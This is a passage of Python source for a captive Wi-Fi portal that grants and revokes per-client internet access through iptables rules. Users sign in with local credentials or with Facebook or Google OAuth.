mac = client["mac"]
# If client was previously logged
if ip in self.clients.keys() and self.clients[ip]["mac"] != None:
# Check if MAC matches previous MAC
if AUTHDAEMON_MAC_CHANGE_CHECK != False and self.clients[ip]["mac"] != mac:
self.log("MAC change detected on " + ip + " : " + self.clients[ip]["mac"] + " --> " + mac)
# De-authorize client
self.clients[ip]["mac"] = None
self.clients[ip]["logged"] = now
self.deauthorizeIP_All(ip)
# Log user
else:
self.clients[ip] = {
"mac" : mac,
"logged" : now
}
def prepare_session(self, ip, stype, expiration):
session = {
"ip" : ip,
"mac" : getMacFromIp(ip),
"type" : stype,
"expiration" : expiration
}
return session
# Update Authorizations
def reauthorizeSession(self, session, seconds):
self.log("Update " + session["ip"] + " to " + session["type"])
session["expiration"] = datetime.datetime.now() + datetime.timedelta(seconds=seconds)
def reauthorizeSessions(self, sessions, seconds):
for session in sessions:
self.reauthorizeSession(session, seconds)
# Authorizations
def authorizeSession(self, session):
self.log("Authorize " + session["ip"] + " to " + session["type"])
self.sessions.append(session)
ip = session["ip"]
if not (ip in self.ip_sessions.keys()):
self.ip_sessions[ip] = []
self.ip_sessions[ip].append(session)
# Allow access to Internet
if session["type"] == "Internet":
# The NAT rule has to be inserted below the captive portal's domain rule (hence position 2)
callCmd(["iptables", "-t", "nat", "-I", "PREROUTING", "2", "-s", ip, "-j" ,"ACCEPT"])
callCmd(["iptables", "-I", "FORWARD", "1", "-s", ip, "-j" ,"ACCEPT"])
# Allow access to Facebook
elif session["type"] == "Facebook-Login":
# Allow Facebook IPs
for ip_addresses in SSO_FACEBOOK_EXCLUDE_IPS:
callCmd(["iptables", "-I", "FORWARD", "-i", INTERFACE_INPUT, "-p", "tcp", "-s", ip, "-d", ip_addresses, "--dport", str(443), "-j" , "ACCEPT"])
# Allow access to Google
elif session["type"] == "Google-Login":
# Allow Google IPs
for ip_addresses in SSO_GOOGLE_EXCLUDE_IPS:
callCmd(["iptables", "-I", "FORWARD", "-i", INTERFACE_INPUT, "-p", "tcp", "-s", ip, "-d", ip_addresses, "--dport", str(443), "-j" , "ACCEPT"])
# Update client info
self.setClientAuthorizations(ip, session["type"], True)
def authorizeSessions(self, sessions):
for session in sessions:
self.authorizeSession(session)
def authorizeIP_Internet(self, ip, seconds):
sessions = self.getSessionsByIP(ip, "Internet")
if len(sessions) > 0:
self.reauthorizeSessions(sessions, seconds)
else:
session = self.prepare_session(ip, "Internet", datetime.datetime.now() + datetime.timedelta(seconds=seconds))
self.authorizeSession(session)
def authorizeIP_FacebookLogin(self, ip, seconds):
sessions = self.getSessionsByIP(ip, "Facebook-Login")
if len(sessions) > 0:
self.reauthorizeSessions(sessions, seconds)
else:
session = self.prepare_session(ip, "Facebook-Login", datetime.datetime.now() + datetime.timedelta(seconds=seconds))
self.authorizeSession(session)
def authorizeIP_GoogleLogin(self, ip, seconds):
sessions = self.getSessionsByIP(ip, "Google-Login")
if len(sessions) > 0:
self.reauthorizeSessions(sessions, seconds)
else:
session = self.prepare_session(ip, "Google-Login", datetime.datetime.now() + datetime.timedelta(seconds=seconds))
self.authorizeSession(session)
# De-authorizations
def deauthorizeSession(self, session):
self.log("De-authorize " + session["ip"] + " from " + session["type"])
self.sessions.remove(session)
ip = session["ip"]
if ip in self.ip_sessions.keys():
self.ip_sessions[ip].remove(session)
# Block access to Internet
if session["type"] == "Internet":
callCmd(["iptables", "-t", "nat", "-D", "PREROUTING", "-s", ip, "-j" ,"ACCEPT"])
callCmd(["iptables", "-D", "FORWARD", "-s", ip, "-j" ,"ACCEPT"])
# Block access to Facebook
elif session["type"] == "Facebook-Login":
# Allow Facebook IPs
for ip_addresses in SSO_FACEBOOK_EXCLUDE_IPS:
callCmd(["iptables", "-D", "FORWARD", "-i", INTERFACE_INPUT, "-p", "tcp", "-s", ip, "-d", ip_addresses, "--dport", str(443), "-j" , "ACCEPT"])
# Block access to Google
elif session["type"] == "Google-Login":
# Allow Google IPs
for ip_addresses in SSO_GOOGLE_EXCLUDE_IPS:
callCmd(["iptables", "-D", "FORWARD", "-i", INTERFACE_INPUT, "-p", "tcp", "-s", ip, "-d", ip_addresses, "--dport", str(443), "-j" , "ACCEPT"])
# Update client info
self.setClientAuthorizations(ip, session["type"], False)
def deauthorizeSessions(self, sessions):
for session in sessions:
self.deauthorizeSession(session)
def deauthorizeIP_Internet(self, ip):
session = self.getSessionsByIP(ip, "Internet")
self.deauthorizeSessions(session)
def deauthorizeIP_FacebookLogin(self, ip):
session = self.getSessionsByIP(ip, "Facebook-Login")
self.deauthorizeSessions(session)
def deauthorizeIP_GoogleLogin(self, ip):
session = self.getSessionsByIP(ip, "Google-Login")
self.deauthorizeSessions(session)
def deauthorizeIP_All(self, ip):
session = self.getSessionsByIP(ip)
self.deauthorizeSessions(session)
# Client info
def getClientAuthorizations(self, ip):
if not (ip in self.authorizations.keys()):
self.authorizations[ip] = {
"Internet" : False,
"Facebook-Login" : False,
"Google-Login" : False
}
return self.authorizations[ip]
def setClientAuthorizations(self, ip, stype, value):
self.getClientAuthorizations(ip)
self.authorizations[ip][stype] = value
def hasClientAuthorization(self, ip, stype):
self.getClientAuthorizations(ip)  # make sure an entry exists for this IP
if stype in self.authorizations[ip].keys():
return self.authorizations[ip][stype]
return False
def hasClient_Internet(self, ip):
return self.hasClientAuthorization(ip, "Internet")
# Other function
def getSessionsByIP(self, ip, stype=None):
sessions = []
if ip in self.ip_sessions.keys():
for session in self.ip_sessions[ip]:
if stype == None or stype == session["type"]:
sessions.append(session)
return sessions
def log(self, message, level = LOG_LEVEL):
msgLog("AuthDaemon", message, level)
''' HTTPS Captive Portal (Main Captive Portal)
-----------------------------------'''
# This is the HTTPS request handler used by the captive portal
class CaptivePortal(http.server.BaseHTTPRequestHandler):
server_variables = {
"server-ip" : LOCAL_SERVER_IP,
"server-port" : HTTPS_SERVER_PORT,
"footer-note" : "© Unipi " + str(datetime.datetime.now().year)
}
sessions = {}
route = {
#"/index": {"file": "index.html", "cached": False},
"/login": {"file": "login.html", "cached": False},
"/status": {"file": "status.html", "cached": False},
"/favicon.ico": {"file": "favicon.ico", "cached": False},
"/css/custom.css": {"file": "css/custom.css", "cached": False},
"/css/bootstrap.min.css": {"file": "css/bootstrap.min.css", "cached": False},
"/css/bootstrap.lumen.min.css": {"file": "css/bootstrap.lumen.min.css", "cached": False},
"/js/jquery.min.js": {"file": "js/jquery.min.js", "cached": False},
"/js/popper.min.js": {"file": "js/popper.min.js", "cached": False},
"/js/bootstrap.min.js": {"file": "js/bootstrap.min.js", "cached": False},
"/img/portal.png": {"file": "img/portal.png", "cached": False},
"/img/portal-other.png": {"file": "img/portal-other.png", "cached": False},
# Other pages
".redirect": {"file": "redirect.html", "cached": False},
".message": {"file": "message.html", "cached": False},
".credentials": {"file": "credentials.html", "cached": False},
".terms": {"file": "ToU.txt", "cached": False},
}
route_alias = {
"/": "/login"
}
def get_route(self, method, rawUrl):
# Parse the URL
url = urllib.parse.urlparse(rawUrl)
parms = urllib.parse.parse_qs(url.query)
path = url.path
# Check alias
if path in self.route_alias.keys():
path = self.route_alias[path]
# Get file
data = self.get_file(path)
# Headers
headers = {}
# Status
status = 200
# Print info
msgLog("Portal", "Request " + path, LOG_VERBOSE)
msgLog("Portal", "User-Agent " + self.headers["User-Agent"], LOG_DEBUG)
#print("url : " + rawUrl)
#print("path : " + path)
# Login Page
if path == '/login':
# Check if logged in
loggedin = self.get_logged_in()
if loggedin == "Facebook" or loggedin == "Google":
data, headers, status = self.do_redirect("/status", "<p>Redirecting...</p>")
else:
# Check if webview (google does not allow login from webview)
isWebView = self.isWebView()
# Replace data
data = self.replace_keys_decode(data, {
# CREDENTIALS_SIGNIN
"credentials-btn-type" : ("btn-info" if CREDENTIALS_SIGNIN else "d-none"),
"credentials-link" : "/credentials",
"facebook-btn-type" : ("btn-primary" if SSO_FACEBOOK else "d-none"),
"facebook-link" : "/facebook/init",
"google-btn-type" : (("btn-secondary" if isWebView else "btn-primary") if SSO_GOOGLE else "d-none"),
"google-link" : "/google/init"
})
# Logout page
if path == '/logout':
self.set_logged_out()
data, headers, status = self.do_redirect("/", "<p>Logging out...</p>", 5)
# Status page
elif path == '/status':
info = getRuleFromIp(self._session["ip"])
if info == None:
info = {"packets" : 0, "bytes" : 0}
# Check if logged in
loggedin = self.get_logged_in()
if loggedin == "Facebook":
data = self.replace_keys_decode(data, {
"title" : "Connected",
"name" : html.escape(self.facebook_get_user_name()),
"login-type" : "Facebook Login",
"packets" : format(info["packets"],',d'),
"bytes" : bytes_sizeof_format(info["bytes"]),
"refresh-link" : "/status",
"logout-link" : "/logout"
})
elif loggedin == "Google":
data = self.replace_keys_decode(data, {
"title" : "Connected",
"name" : html.escape(self.google_get_user_name()),
"login-type" : "Google Login",
"packets" : format(info["packets"],',d'),
"bytes" : bytes_sizeof_format(info["bytes"]),
"refresh-link" : "/status",
"logout-link" : "/logout"
})
elif loggedin == "Credentials":
data = self.replace_keys_decode(data, {
"title" : "Connected",
"name" : html.escape(self.credentials_get_user_name()),
"login-type" : "Credentials Login",
"packets" : format(info["packets"],',d'),
"bytes" : bytes_sizeof_format(info["bytes"]),
"refresh-link" : "/status",
"logout-link" : "/logout"
})
else:
data, headers, status = self.do_redirect("/login", "<p>Redirecting...</p>")
# Credentials
elif CREDENTIALS_SIGNIN and path == '/credentials':
alert = {"type" : "d-none", "message" : ""}
authenticated = False
if method == 'POST':
form = self.parse_posted_data()
if form != None and not ('checkbox' in form.keys()):
alert["type"] = "alert-danger"
alert["message"] = "Please accept the terms"
elif form != None and ('username' in form.keys()) and ('password' in form.keys()):
authenticated = database.authenticateUser(form['username'], form['password'])
if authenticated:
authenticated = form['username']
else:
alert["type"] = "alert-danger"
alert["message"] = "Authentication failed"
else:
alert["type"] = "alert-danger"
alert["message"] = "Invalid data posted"
if not authenticated:
data = self.get_file(".credentials");
data = self.replace_keys_decode(data, {
"action-link" : "credentials",
"checkbox-class" : "", #"d-none",
"checkbox-html" : 'Accept the <a href="/terms">Terms of Use</a>',
# Alert info
"alert-type" : alert["type"], #alert-danger
"alert-message" : alert["message"],
})
else:
self.credentials_auth(authenticated)
self.authorize_internet()
data, headers, status = self.do_redirect("/status", "<p>Redirecting...</p>")
elif CREDENTIALS_SIGNIN and path == '/terms':
#headers = {"Content-type": "text/html; charset=UTF-8"}
txt = self.get_file(".terms").decode("utf-8");
data, headers, status = self.do_message(
"Terms of Use",
("<p style=\"text-align: left;\">%s</p>" +
"<a href=\"%s\" class=\"btn btn-outline-primary\">< Back</a>" +
"") % (html.escape(txt).replace("\n","<br>"), REMOTE_SERVER_LINK)
)
# Facebook - Pre-Oauth
elif SSO_FACEBOOK and path == '/facebook/init':
fb_redirect = self.facebook_pre_oauth()
data, headers, status = self.do_redirect(fb_redirect, "<p>You have %d seconds to sign in...</p>" % ACCESS_TIME_FACEBOOK_LOGIN, 5)
# Facebook - Post-Oauth
elif SSO_FACEBOOK and path == '/facebook/oauth':
fb_authcode = ''
fb_state = ''
if ('code' in parms.keys()) and ('state' in parms.keys()):
fb_authcode = parms['code'][0]
fb_state = parms['state'][0]
error = self.facebook_post_oauth(fb_authcode, fb_state)
if error == None:
self.authorize_internet()
data, headers, status = self.do_redirect("/status", "<p>Redirecting...</p>")
else:
data, headers, status = self.do_message(
"Failed",
("<p>Failed to login with Facebook</p><p><small>Error: %s</small></p>" +
"<a href=\"%s\" class=\"btn btn-outline-primary\">< Back</a>" +
"") % (html.escape(error), REMOTE_SERVER_LINK)
)
# Google - Pre-Oauth
elif SSO_GOOGLE and path == '/google/init':
if self.isWebView():
data, headers, status = self.do_message(
"Failed",
("<p>This browser does not support Google sign in.<br>" +
"Please open this page using another browser (e.g. Chrome, Firefox)</p>" +
"<input type=\"text\" value=\"%s\" style=\"text-align:center;\"><br><br>" +
"<a href=\"%s\" class=\"btn btn-outline-primary\">< Back</a>" +
"") % (REMOTE_SERVER_LINK, REMOTE_SERVER_LINK)
)
else:
gg_redirect = self.google_pre_oauth()
data, headers, status = self.do_redirect(gg_redirect, "<p>You have %d seconds to sign in...</p>" % ACCESS_TIME_GOOGLE_LOGIN, 5)
# Google - Post-Oauth
elif SSO_GOOGLE and path == '/google/oauth':
gg_code = ''
gg_scope = ''
if ('code' in parms.keys()) and ('scope' in parms.keys()):
gg_code = parms['code'][0]
gg_scope = parms['scope'][0]
error = self.google_post_oauth(gg_code, gg_scope)
if error == None:
self.authorize_internet()
data, headers, status = self.do_redirect("/status", "<p>Redirecting...</p>")
else:
data, headers, status = self.do_message(
"Failed",
("<p>Failed to login with Google</p><p><small>Error: %s</small></p>" +
"<a href=\"%s\" class=\"btn btn-outline-primary\">< Back</a>" +
"") % (html.escape(error), REMOTE_SERVER_LINK)
)
return data, headers, status
def parse_posted_data(self):
data = None
if 'Content-Length' in self.headers.keys():
length = int(self.headers['Content-Length'])
body = self.rfile.read(length)
if 'Content-Type' in self.headers.keys():
if self.headers['Content-Type'] == "application/x-www-form-urlencoded":
binary = urllib.parse.parse_qs(body)
data = {}
for key in binary.keys():
data[key.decode('ascii')] = binary[key][0].decode('ascii')
return data
def get_logged_in(self):
if self.session_hasInternet():
date = self.session_get("authorized", datetime.datetime(1970, 1, 1))
if date > datetime.datetime.now():
date = self.session_get("fb-authorized", datetime.datetime(1970, 1, 1))
if date > datetime.datetime.now():
fb_user_info = self.session_get("fb-user-info", None)
if (fb_user_info != None) and ("name" in fb_user_info.keys()):
return "Facebook"
date = self.session_get("gg-authorized", datetime.datetime(1970, 1, 1))
if date > datetime.datetime.now():
gg_user_info = self.session_get("gg-user-info", None)
if (gg_user_info != None) and ("name" in gg_user_info.keys()):
return "Google"
date = self.session_get("cr-authorized", datetime.datetime(1970, 1, 1))
if date > datetime.datetime.now():
cr_user_info = self.session_get("cr-user-info", None)
if (cr_user_info != None) and ("name" in cr_user_info.keys()):
return "Credentials"
return None
def set_logged_out(self):
self.deauthorize_internet()
self.facebook_deoauth()
self.google_deoauth()
self.credentials_deoauth()
# Credentials
def credentials_auth(self, username):
user_info = {"name" : username}
# Save session data
self.session_set("cr-user-info", user_info)
self.session_set("cr-authorized", datetime.datetime.now() + datetime.timedelta(seconds=ACCESS_TIME_INTERNET))
msgLog("Credentials", "Authorized user \"" + user_info["name"] + "\"")
return None
def credentials_deoauth(self):
self.session_set("cr-user-info", None)
self.session_set("cr-authorized", datetime.datetime(1970, 1, 1))
def credentials_get_user_name(self):
return self.session_get("cr-user-info", {"name":"Unknown"})["name"]
# Facebook Login
def facebook_deoauth(self):
self.session_set("fb-access-token", None)
self.session_set("fb-user-info", None)
self.session_set("fb-state", None)
self.session_set("fb-authorized", datetime.datetime(1970, 1, 1))
def facebook_pre_oauth(self):
self.facebook_deoauth()
authDaemon.authorizeIP_FacebookLogin(self._session["ip"], ACCESS_TIME_FACEBOOK_LOGIN)
fb_state = binascii.b2a_hex(os.urandom(32)).decode("utf-8")
self.session_set("fb-state", fb_state)
return "https://www.facebook.com/v7.0/dialog/oauth?client_id=%s&redirect_uri=%s&state=%s" % (SSO_FACEBOOK_APP_ID, REMOTE_SERVER_LINK + "facebook/oauth", fb_state)
def facebook_post_oauth(self, fb_authcode, fb_state):
authDaemon.deauthorizeIP_FacebookLogin(self._session["ip"])
# Check state
if not (fb_state == self.session_get("fb-state", None)):
return "Invalid oauth state."
# Get Facebook access token
#print("https://graph.facebook.com" + ("/v7.0/oauth/access_token?client_id=%s&redirect_uri=%s&client_secret=%s&code=%s" % (SSO_FACEBOOK_APP_ID, REMOTE_SERVER_LINK + "facebook/oauth", SSO_FACEBOOK_APP_SECRET, fb_authcode)))
conn = http.client.HTTPSConnection("graph.facebook.com")
conn.request("GET", "/v7.0/oauth/access_token?client_id=%s&redirect_uri=%s&client_secret=%s&code=%s" % (SSO_FACEBOOK_APP_ID, REMOTE_SERVER_LINK + "facebook/oauth", SSO_FACEBOOK_APP_SECRET, fb_authcode))
res = conn.getresponse()
#print(type(res.status), res.status)
#print(type(res.reason), res.reason)
#if res.status != 200 or res.reason != "OK":
# return "Invalid status was returned (%s,%s)." % (str(res.status), res.reason)
response = res.read()
conn.close()
# Parse response
fb_access_token = json.loads(response)
if not ("access_token" in fb_access_token.keys()):
return "Failed to get access token."
fb_access_token = fb_access_token["access_token"]
# Get user info
conn = http.client.HTTPSConnection("graph.facebook.com")
conn.request("GET", "/v7.0/me?fields=id,name,email&access_token=%s" % (fb_access_token))
res = conn.getresponse()
#if res.status != 200 or res.reason != "OK":
# return "Invalid status was returned (%s,%s)." % (str(res.status), res.reason)
response = res.read()
conn.close()
fb_user_info = json.loads(response)
if not ("id" in fb_user_info.keys() and "name" in fb_user_info.keys()):
return "Failed to get user info."
# Save session data
self.session_set("fb-access-token", fb_access_token)
self.session_set("fb-user-info", fb_user_info)
self.session_set("fb-state", None)
self.session_set("fb-authorized", datetime.datetime.now() + datetime.timedelta(seconds=ACCESS_TIME_INTERNET))
msgLog("Facebook", "Authorized Facebook user \"" + fb_user_info["name"] + "\" [#" + fb_user_info["id"] + "]")
return None
def facebook_get_user_id(self):
return self.session_get("fb-user-info", {"id":0})["id"]
def facebook_get_user_name(self):
return self.session_get("fb-user-info", {"name":"Unknown"})["name"]
# Google Login
def google_deoauth(self):
self.session_set("gg-access-token", None)
self.session_set("gg-refresh-token", None)
self.session_set("gg-user-info", None)
self.session_set("gg-code-verifier", None)
self.session_set("gg-authorized", datetime.datetime(1970, 1, 1))
def google_pre_oauth(self):
self.google_deoauth()
authDaemon.authorizeIP_GoogleLogin(self._session["ip"], ACCESS_TIME_GOOGLE_LOGIN)
gg_code_verifier = binascii.b2a_hex(os.urandom(32)).decode("utf-8")
self.session_set("gg-code-verifier", gg_code_verifier)
return "https://accounts.google.com/o/oauth2/v2/auth?client_id=%s&redirect_uri=%s&code_challenge=%s&response_type=code&scope=email profile" % (SSO_GOOGLE_CLIENT_ID, REMOTE_SERVER_LINK + "google/oauth", gg_code_verifier)
def google_post_oauth(self, gg_code, gg_scope):
authDaemon.deauthorizeIP_GoogleLogin(self._session["ip"])
# Check scope?
# Get code verifier
gg_code_verifier = self.session_get("gg-code-verifier", None)
if gg_code_verifier == None:
return "Invalid oauth code verifier."
# Wait
time.sleep(0.5)
# Get Google access token
conn = http.client.HTTPSConnection("oauth2.googleapis.com")
conn.request("POST", "/token", urllib.parse.urlencode({
"client_id" : SSO_GOOGLE_CLIENT_ID,
"client_secret" : SSO_GOOGLE_CLIENT_SECRET,
"code" : gg_code,
"code_verifier" : gg_code_verifier,
"grant_type" : "authorization_code",
"redirect_uri" : REMOTE_SERVER_LINK + "google/oauth",
}), {
"Content-type": "application/x-www-form-urlencoded",
#"Accept": "text/plain"
})
res = conn.getresponse()
#if res.status != 200 or res.reason != "OK":
# return "Invalid status was returned (%s,%s)." % (str(res.status), res.reason)
response = res.read()
conn.close()
# Parse response
gg_data = json.loads(response)
if not ("access_token" in gg_data.keys()):
return "Failed to get access token."
gg_access_token = gg_data["access_token"]
#gg_refresh_token = gg_data["refresh_token"]
#gg_expire_in = gg_data["expires_in"]
# Get user info
conn = http.client.HTTPSConnection("www.googleapis.com")
conn.request("GET", "/oauth2/v2/userinfo?access_token=%s" % (gg_access_token))
res = conn.getresponse()
#if res.status != 200 or res.reason != "OK":
# return "Invalid status was returned (%s,%s)." % (str(res.status), res.reason)
response = res.read()
conn.close()
gg_user_info = json.loads(response)
if not ("id" in gg_user_info.keys() and "name" in gg_user_info.keys()):
return "Failed to get user info."
# Save session data
self.session_set("gg-access-token", gg_access_token)
#self.session_set("gg-refresh-token", gg_refresh_token)
self.session_set("gg-user-info", gg_user_info)
self.session_set("gg-code-verifier", None)
self.session_set("gg-authorized", datetime.datetime.now() + datetime.timedelta(seconds=ACCESS_TIME_INTERNET))
msgLog("Google", "Authorized Google user \"" + gg_user_info["name"] + "\" [#" + gg_user_info["id"] + "]")
return None
def google_get_user_id(self):
return self.session_get("gg-user-info", {"id":0})["id"]
def google_get_user_name(self):
return self.session_get("gg-user-info", {"name":"Unknown"})["name"]
def isWebView(self):
# Check requested with header
if ("X-Requested-With" in self.headers.keys()):
# Android Web View
if self.headers["X-Requested-With"] == "com.android.htmlviewer":
return True
# Check browser user agent
if ("User-Agent" in self.headers.keys()):
# Android Web View
if "; wv" in self.headers["User-Agent"]:
return True
# Probably not
return False
def get_file(self, name):
# If route exists
if name in self.route.keys():
if self.route[name]["cached"] == None:
return self.load_file(self.route[name]["file"])
# If not cached
if self.route[name]["cached"] == False:
self.route[name]["cached"] = self.load_file(self.route[name]["file"])
# Return file
return self.route[name]["cached"]
# File not found
return None
def load_file(self, path):
# Calculate path
path = os.path.join(PAGES_PATH, path)
# Load file
file = open(path, "rb")
data = file.read()
file.close()
# If HTML
name, ext = os.path.splitext(path)
if ext == ".html":
data = self.replace_keys_decode(data, self.server_variables)
# Return file
return data
def replace_keys(self, html, variables):
for name, value in variables.items():
html = html.replace("{{" + name + "}}", str(value))
return html
def replace_keys_decode(self, data, variables):
return self.replace_keys(data.decode("utf-8"), variables).encode()
def get_content_type(self, ext):
# Common files
if ext == ".css" :
return "text/css"
elif ext == ".css" :
return "text/css"
elif ext == ".html" :
return "text/html"
elif ext == ".js" :
return "text/javascript"
elif ext == ".png" :
return "image/png"
elif ext == ".jpg" or ext == ".jpeg" :
return "image/jpeg"
elif ext == ".svg" :
return "image/svg+xml"
elif ext == ".ico" :
return "image/x-icon"
elif ext == ".txt" :
return "text/plain"
elif ext == ".crt" :
return "application/x-x509-ca-cert"
elif ext == ".pdf" :
return "application/pdf"
return "text/html"
def session_init(self):
ip = self.client_address[0]
#mac = getMacFromIp(ip)
self._session = {
"ip" : ip,
#"mac" : mac
}
if not (ip in self.sessions.keys()):
self.sessions[ip] = {
"ip" : ip,
#"mac" : mac,
"data" : {}
}
return
def session_hasInternet(self):
if authDaemon.hasClient_Internet(self._session["ip"]) == False:
return False
return True
def session_set(self, key, value):
self.sessions[self._session["ip"]]["data"][key] = value
def session_get(self, key, defvalue):
if key in self.sessions[self._session["ip"]]["data"].keys():
return self.sessions[self._session["ip"]]["data"][key]
else:
return defvalue
def authorize_internet(self):
ip = self._session["ip"]
self.session_set("authorized", datetime.datetime.now() + datetime.timedelta(seconds=ACCESS_TIME_INTERNET))
authDaemon.authorizeIP_Internet(self._session["ip"], ACCESS_TIME_INTERNET)
def deauthorize_internet(self):
ip = self._session["ip"]
self.session_set("authorized", datetime.datetime(1970, 1, 1))
authDaemon.deauthorizeIP_All(self._session["ip"])
# Handle GET requests
def do_GET(self):
self.session_init()
# Get file
body, headers, status = self.get_route('GET', self.path)
if body == None :
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(str("404: file not found").encode())
return
# Path info
file_name, file_extension = os.path.splitext(self.path)
# Create headers
self.send_response(status)
self.send_header("Content-type", self.get_content_type(file_extension))
for key, value in headers.items():
self.send_header(key, value)
self.end_headers()
# Return file
self.wfile.write(body)
# Handle POST requests
def do_POST(self):
self.session_init()
# Get file
body, headers, status = self.get_route('POST', self.path)
if body == None :
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(str("404: file not found").encode())
return
# Path info
file_name, file_extension = os.path.splitext(self.path)
# Create headers
self.send_response(status)
self.send_header("Content-type", self.get_content_type(file_extension))
for key, value in headers.items():
self.send_header(key, value)
self.end_headers()
# Return file
self.wfile.write(body)
def do_redirect(self, location, message, seconds = 0):
#status = 302
status = 200
headers = {"Location": location}
data = self.get_file(".redirect");
data = self.replace_keys_decode(data, {
"location" : location,
"message" : message,
"seconds" : str(seconds)
})
return data, headers, status
def do_message(self, title, message):
status = 200
headers = {}
data = self.get_file(".message");
data = self.replace_keys_decode(data, {
"title" : title,
"message" : message
})
return data, headers, status
# The following override silences the default per-request logging;
# comment it out if you want to print diagnostic messages.
def log_message(self, format, *args):
return
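# Editor's note (illustrative, not used by the server): the page templating implemented
# by replace_keys above is a plain "{{name}}" string substitution, e.g.
#
#     "<title>{{title}}</title>".replace("{{" + "title" + "}}", "Connected")
#     # -> "<title>Connected</title>"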
''' HTTP Captive Portal
-----------------------------------'''
class RedirectPortal(CaptivePortal):
route = {
"/favicon.ico": {"file": "favicon.ico", "cached": False},
"/css/custom.css": {"file": "css/custom.css", "cached": False},
"/css/bootstrap.min.css": {"file": "css/bootstrap.min.css", "cached": False},
"/css/bootstrap.lumen.min.css": {"file": "css/bootstrap.lumen.min.css", "cached": False},
"/js/jquery.min.js": {"file": "js/jquery.min.js", "cached": False},
"/js/popper.min.js": {"file": "js/popper.min.js", "cached": False},
"/js/bootstrap.min.js": {"file": "js/bootstrap.min.js", "cached": False},
"/img/portal.png": {"file": "img/portal.png", "cached": False},
"/img/portal-other.png": {"file": "img/portal-other.png", "cached": False},
# Other pages
".redirect": {"file": "redirect.html", "cached": False},
".message": {"file": "message.html", "cached": False},
}
def get_route(self, method, rawUrl):
# Parse the URL
url = urllib.parse.urlparse(rawUrl)
path = url.path
# Headers
headers = {}
# Status
status = 200
# Get file
data = self.get_file(path)
# If file not found
if data == None:
data, headers, status = self.do_redirect(REMOTE_SERVER_LINK, "<p>Redirecting to captive portal...</p>", 2)
return data, headers, status
# Handle GET requests
def do_GET(self):
# Get file
body, headers, status = self.get_route('GET', self.path)
if body == None :
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(str("404: file not found").encode())
return
# Path info
file_name, file_extension = os.path.splitext(self.path)
# Create headers
self.send_response(status)
self.send_header("Content-type", self.get_content_type(file_extension))
for key, value in headers.items():
self.send_header(key, value)
self.end_headers()
# Return file
self.wfile.write(body)
def do_POST(self):
# Get file
body, headers, status = self.get_route('POST', self.path)
if body == None :
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(str("404: file not found").encode())
return
# Path info
file_name, file_extension = os.path.splitext(self.path)
# Create headers
self.send_response(status)
self.send_header("Content-type", self.get_content_type(file_extension))
for key, value in headers.items():
self.send_header(key, value)
self.end_headers()
# Return file
self.wfile.write(body)
''' Other Functions
-----------------------------------'''
# Run command
def callCmd(cmd):
subprocess.call(cmd)
def runCmd(cmd):
return subprocess.run(cmd, shell=True, check=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# List ARP information
def getArpList():
# Get arp
result = runCmd('arp -a')
if result.returncode != 0:
return []
# Parse data
data = result.stdout.decode('utf-8')
data = re.findall(r"\((\d+\.\d+\.\d+\.\d+)\)\s+at\s+([0-9A-Za-z]+:[0-9A-Za-z]+:[0-9A-Za-z]+:[0-9A-Za-z]+:[0-9A-Za-z]+:[0-9A-Za-z]+)\s+\[([^\]]*)\]", data)
devices = []
for device in data:
devices.append({
'ip' : device[0],
'mac' : device[1],
'interface' : device[2]
})
# Return data
return devices
# Get MAC from IP
def getMacFromIp(ip):
devices = getArpList()
for device in devices:
if device['ip'] == ip:
return device['mac']
return '00:00:00:00:00:00'
# List rules information
def getRulesList():
# Get rules
result = runCmd('iptables -L FORWARD -n -v -x')
if result.returncode != 0:
return []
# Parse data
# 7609 2108649 ACCEPT all -- * * 192.168.20.97 0.0.0.0/0
data = result.stdout.decode('utf-8')
data = re.findall(r"\s+(\d+)\s+(\d+)\s+ACCEPT\s+all\s+--\s+\*\s+\*\s+(\d+\.\d+\.\d+\.\d+)\s+0\.0\.0\.0\/0", data)
rules = []
for rule in data:
rules.append({
'packets' : int(rule[0]),
'bytes' : int(rule[1]),
'ip' : rule[2]
})
# Return data
return rules
# Get Rule from IP
def getRuleFromIp(ip):
rules = getRulesList()
for rule in rules:
if rule['ip'] == ip:
return rule
return None
def bytes_sizeof_format(num, suffix='B'):
for unit in ['','K','M','G','T','P','E','Z']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Y', suffix)
''' Script Start Functions
-----------------------------------'''
# Start Server
def start_server():
threading.Thread(target = server_http).start()
threading.Thread(target = server_https).start()
def server_http():
msgLog("WebServer", "Starting HTTP server")
server = http.server.ThreadingHTTPServer(('', HTTP_SERVER_PORT), RedirectPortal)
try:
server.serve_forever()
except KeyboardInterrupt:
pass
server.server_close()
def server_https():
msgLog("WebServer", "Starting HTTPS server")
#server = http.server.HTTPServer(('', 443), CaptivePortal)
#server = http.server.ThreadingHTTPServer(('', 443), CaptivePortal)
server = http.server.ThreadingHTTPServer(('', HTTPS_SERVER_PORT), CaptivePortal)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=SSL_CERT_PATH, keyfile=SSL_KEY_PATH)
server.socket = context.wrap_socket(server.socket, server_side=True)
try:
server.serve_forever()
except KeyboardInterrupt:
pass
server.server_close()
def database_init():
if CREDENTIALS_SIGNIN == True:
global database
msgLog("Database", "Initializing database")
database = Database()
# Create Users Example
#database.createUser('test', 'test')
#database.createUser('unipi', 'unipi')
def iptables_reset():
if IPTABLES_RESET == True:
msgLog("iptables", "Reseting iptables")
callCmd(["iptables", "-P", "INPUT", "ACCEPT"])
callCmd(["iptables", "-P", "FORWARD", "ACCEPT"])
callCmd(["iptables", "-P", "OUTPUT", "ACCEPT"])
callCmd(["iptables", "-t", "nat", "-F"])
callCmd(["iptables", "-t", "mangle", "-F"])
callCmd(["iptables", "-F"])
callCmd(["iptables", "-X"])
if IPTABLES_FORWARD == True:
callCmd(["iptables", "-t", "nat", "-A", "POSTROUTING", "-o", INTERFACE_OUTPUT, "-j", "MASQUERADE"])
def iptables_init():
if IPTABLES_INIT == True:
msgLog("iptables", "Initializing iptables")
# Allow DNS if not custom DNS
if not USE_CUSTOM_DNS_SERVER:
